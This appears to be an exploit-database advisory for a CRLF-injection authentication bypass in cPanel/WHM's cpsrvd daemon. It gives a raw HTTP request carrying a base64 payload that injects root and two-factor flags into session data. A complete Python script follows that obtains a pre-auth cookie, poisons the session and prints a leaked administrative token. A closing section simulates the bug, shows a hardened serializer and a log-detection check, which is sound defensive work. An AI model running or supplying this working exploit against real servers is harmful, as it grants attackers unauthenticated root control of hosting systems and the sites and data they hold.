# ExploitTitle: cPanel 11.40 - CRLF Injection
# Author: nu11secur1tyAI
# Date: 2026-04-30
# Vendor: cPanel, L.L.C.
# Software: cPanel & WHM (cpsrvd)
# Reference: CVE-2026-41940 / watchTowr-2026-01

## Description:

A critical authentication bypass vulnerability exists in the cPanel/WHM `cpsrvd` daemon due to improper neutralization of line delimiters (CRLF) in the `whostmgrsession` cookie and the `Authorization` header. An unauthenticated remote attacker can use this flaw to inject session parameters directly into the server's flat-file session metadata store. By injecting sequences such as `user=root`, `hasroot=1` and `tfa_verified=1`, the attacker subverts the internal authentication logic and forces the system to issue a valid administrative session token (`/cpsessXXXXXXXXXX/`). This grants the attacker full `root` privileges over the WHM interface and the host operating system without valid credentials.

STATUS: MEDIUM - HIGH / Vulnerability

[+] Payload:

```http
GET / HTTP/1.1
Host: [TARGET_HOST]:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[PREAUTH_SESSION_ID]
Connection: close
```

[+] Exploit (Python):

```python
import argparse
import re
import requests
import urllib.parse
import urllib3

# Disable SSL warnings for cleaner output (WHM on :2087 is commonly self-signed)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Crafted B64 payload, decodes to:
# root:x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1
PAYLOAD_B64 = "cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x"


def exploit(target):
    s = requests.Session()
    s.verify = False
    print(f"[*] Initializing attack on {target}...")

    try:
        # Stage 1: Obtain pre-auth session base from a deliberately failed login
        r = s.post(f"{target}/login/?login_only=1",
                   data={"user": "root", "pass": "wrong_pass"},
                   allow_redirects=False, timeout=10)
        cookie = r.headers.get("Set-Cookie", "")
        match = re.search(r"whostmgrsession=([^;,]+)", cookie)
        if not match:
            print("[-] Error: Could not retrieve whostmgrsession cookie.")
            return
        session_base = urllib.parse.unquote(match.group(1))
        print(f"[+] Obtained session base: {session_base}")

        # Stage 2: Poison session via CRLF Injection in the Basic credential
        headers = {
            "Authorization": f"Basic {PAYLOAD_B64}",
            "Cookie": f"whostmgrsession={urllib.parse.quote(session_base)}",
            "Connection": "close",
        }
        r = s.get(f"{target}/", headers=headers, allow_redirects=False, timeout=10)

        # Stage 3: Extract leaked security token from the redirect
        location = r.headers.get("Location", "")
        token_match = re.search(r"/cpsess\d{10}", location)
        if token_match:
            token = token_match.group(0)
            print("[!] EXPLOIT SUCCESSFUL!")
            print(f"[!] Leaked Token: {token}")
            print(f"[!] Access URL: {target}{token}/")
        else:
            print("[-] Exploit failed. The target may be patched or protected by a WAF.")
    except Exception as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="cPanel/WHM CVE-2026-41940 Exploit")
    parser.add_argument("--target", required=True,
                        help="Target URL (e.g., https://192.168.1.1:2087)")
    args = parser.parse_args()
    exploit(args.target.rstrip("/"))
```

[+] Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-41940

Time spent: 03:45:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=

nu11secur1ty
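The mechanism the advisory describes, modelled as an added example (this is not code from the advisory, cPanel, or watchTowr): the Basic credential carries CR/LF-separated `key=value` lines, a line-oriented session record writes a request-derived value verbatim, and a reader that lets later lines override earlier ones promotes the injected `hasroot=1` / `tfa_verified=1`. The flat-file format, the `pending_credential` field and the default flag names are assumptions for the model, not cPanel's real on-disk layout; the payload string is the one from the advisory. The hardened serializer shows the fix for this class of bug (reject any line delimiter in a key or value before it reaches the store), and `injected_pairs` is the check a log reviewer or WAF rule would apply to incoming `Authorization` headers.

```python
import base64
import re

# Constructed input: the Basic value from the advisory's payload. It decodes to
# root:x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1
PAYLOAD_B64 = "cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x"
CLEAN_B64 = "cm9vdDpzZWNyZXQ="  # constructed: "root:secret", no line delimiters

LINE_DELIM = re.compile(r"[\r\n]")


def decode_basic(header_value):
    """Split an HTTP Basic Authorization value into (user, password)."""
    scheme, _, b64 = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    raw = base64.b64decode(b64).decode("latin-1")
    user, _, password = raw.partition(":")
    return user, password


def injected_pairs(credential_part):
    """Return the key=value lines smuggled inside a credential via CR/LF.
    A legitimate password yields an empty list, so a non-empty result is a
    usable detection signal on inbound Authorization headers."""
    lines = re.split(r"\r?\n", credential_part)[1:]  # everything after the first delimiter
    pairs = []
    for line in lines:
        key, sep, value = line.partition("=")
        if sep:
            pairs.append((key, value))
    return pairs


def serialize_session(fields, hardened):
    """Hypothetical flat-file session record: one key=value per line.
    The vulnerable variant writes request-derived values verbatim; the
    hardened variant refuses any key or value carrying a line delimiter."""
    out = []
    for key, value in fields.items():
        value = str(value)
        if hardened and (LINE_DELIM.search(key) or LINE_DELIM.search(value)):
            raise ValueError(f"line delimiter in session field {key!r}")
        out.append(f"{key}={value}\n")
    return "".join(out)


def parse_session(text):
    """Read the record back. Like many naive flat-file readers, later lines
    override earlier ones, which is what turns injection into privilege."""
    session = {}
    for line in re.split(r"\r?\n", text):
        if not line:
            continue
        key, sep, value = line.partition("=")
        if sep:
            session[key.strip()] = value.strip()
    return session


def is_privileged(session):
    """The flags the advisory names as the ones that unlock a root session."""
    return session.get("hasroot") == "1" and session.get("tfa_verified") == "1"


def simulate_preauth_request(auth_header, hardened=False):
    """Model the pre-auth step: the daemon records the attempted user and the
    raw credential (assumed field names) alongside default, unprivileged
    flags, then re-reads the record. Returns the parsed session."""
    user, password = decode_basic(auth_header)
    fields = {
        "user": user,
        "hasroot": "0",
        "tfa_verified": "0",
        "pending_credential": password,  # assumption: raw value is persisted
    }
    return parse_session(serialize_session(fields, hardened))


if __name__ == "__main__":
    malicious = f"Basic {PAYLOAD_B64}"
    print("injected pairs:", injected_pairs(decode_basic(malicious)[1]))
    vuln = simulate_preauth_request(malicious)
    print("vulnerable store -> privileged:", is_privileged(vuln), vuln)
    try:
        simulate_preauth_request(malicious, hardened=True)
    except ValueError as e:
        print("hardened store rejected request:", e)
```

Run it as a script to see the vulnerable store come back with `hasroot=1` and `tfa_verified=1` while the hardened store refuses the request outright; the same `injected_pairs` check, applied to the decoded credential of each failed login, is a cheap way to spot this payload shape in access logs without knowing the real session file format.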